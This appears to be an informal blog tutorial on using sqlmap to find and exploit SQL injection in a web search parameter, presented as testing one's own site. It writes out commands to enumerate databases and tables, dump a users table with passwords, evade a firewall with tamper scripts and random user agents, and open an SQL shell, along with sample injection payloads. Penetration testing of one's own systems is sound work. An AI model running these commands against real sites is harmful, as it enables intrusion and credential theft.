SQL Injection is the most nasty vulnerability existed. Its allows an attacker to interfere with the queries that an application makes to its database. A successful SQL injection attack, may cause data leaks such as administration credentials, payment detail and etc. Your data will be in black market if they want to make it as a profit them self. And more worst, it’s allow the attackers to run shell in your server and taking control everything they can.
This vulnerability still relevant this days because of many systems world wide still not serialize user input.
You might want to penetrate your own system whether your system capable to defend from SQL Injection. No system is safe by the way 😅. If your system manage to defend against SQL Injection, the attackers will tried hundreds more way to penetrate your system.
Okay.. The easy way to test SQL Injection is by using a pentest tool called sqlmap.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Installation
For Mac, you can install directly from Homebrew
For others, you can download the latest from zipball or tarball.
After a successful install, went you type sqlmap or python3 sqlmap.py , the output show be like below
Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
Usage (Happy Flow)
The usage is very straight forward actually. You can simply type sqlmap -hh to see all the arguments. It’s already pretty explain and i can’t show all of it.
Please use your own website url. Any url you tested is under your own responsibility
Let’s get started.
Checking if parameter is exploitable
For example, some website have searching parameter that use to query in the database. http://example.com.my/search?filter=1. You not sure whether filter parameter is secure or not. You can just:-
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" The output would be something like this
[14:50:42] [INFO] testing connection to the target URL
[14:50:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:50:42] [INFO] testing if the target URL content is stable
[14:50:43] [INFO] target URL content is stable
[14:50:43] [INFO] testing if GET parameter 'filter' is dynamic
[14:50:43] [INFO] GET parameter 'filter' appears to be dynamic
[14:50:43] [INFO] heuristic (basic) test shows that GET parameter 'filter' might be injectable (possible DBMS: 'MySQL')
[14:50:43] [INFO] heuristic (XSS) test shows that GET parameter 'filter' might be vulnerable to cross-site scripting (XSS) attacks
[14:50:44] [INFO] testing for SQL injection on GET parameter 'filter'
.....
.....
.....
---
Parameter: filter (GET) Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: filter=1 AND 1450=1450 Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: filter=1 AND GTID_SUBSET(CONCAT(0x716b7a7a71,(SELECT (ELT(8537=8537,1))),0x71717a7071),8537) Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: filter=1 AND (SELECT 9652 FROM (SELECT(SLEEP(5)))FTDn) Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: filter=1 UNION ALL SELECT CONCAT(0x716b7a7a71,0x4b54775259664e73714b7674557976445053435567684f484d5547784a647a4274434b4e6d686774,0x71717a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[15:00:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.3.10, PHPback-end DBMS: MySQL >= 5.5
....
....
Oh no!. the filter parameter is exploitable. Those info shows that the parameter injectable. The moment it’s say injectable, you know that you f$$ked up already if someone found it first.
From the injectable parameter, let’s continue to get the list of databases.
Fetching Databases
Since sqlmap store session, we can use same command earlier and it will immediately tried to fetch database based on previous exploited payload.
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" --dbsThe output would be something like this
...
...
...
[15:10:47] [INFO] fetching database names
available databases [240]: [*] information_schema
[*] database1
[*] database2
[*] database3
[*] database4
...
...
Hmmm 🤔. Available databases listed is 240. That’s a lot!. How about we take a look at database1
Fetching Tables
By using the same command,
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" -D database1 --tablesLets see the output
[15:38:00] [INFO] fetching tables for database: 'database1'
[15:38:00] [INFO] resumed: 'users'
[15:38:00] [INFO] resumed: 'permissions'
[15:38:00] [INFO] resumed: 'products'
[15:38:00] [INFO] resumed: 'user'
[15:38:00] [INFO] resumed: 'user_token' Database: database1
[5 tables]
+-------------------+
| users |
| permissions |
| products |
| token_access |
| user_token |
+-------------------+
Table users?. Looks tempting. How about we dump all the users and see if we can get administrator user
Fetching Columns and Dumping Tables
You might want to know what list of columns for table users
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" -D database1 --columns -D database1 -T usersBut, i prefer to dump the tables
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" -D database1 --dump -D database1 -T usersOutput:-
Database: database1
Table: users
[4 entries]
+--------+------------+------------+
| id | username | password |
+--------+------------+------------+
| 1 | admin | admin123 |
+--------+------------+------------+
| 2 | admin2 | Qw123@12 |
+--------+------------+------------+
| 3 | john | John233 |
+--------+------------+------------+
| 4 | doe | Pos1233 |
+--------+------------+------------+
Tada~~ List of users is on your hand right now! Mostly, password is hashed. All you need is to crack the password.
Bypassing WAF/IPS
I believe a lot of applications use WAF. WAF will protect the incoming request and blocked any malicious request. How to bypass it? sqlmap have tamper argument which obfuscate the payload sent to confuse the WAF.
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" --tamper=space2commentThere is several type of tamper and can be mix. Can refer here. Its recommended to also add random agent in the request.
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" --tamper=space2comment --random-agentExtras
If you prefer you want to write your own sql command, you can use SQL shell
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" --sql-shellThe output:
[16:14:54] [INFO] calling MySQL shell. To quit type ‘x’ or ‘q’ and press ENTER
sql-shell> Select * from users;
Thats all guys. Thanks for your time~~ 😬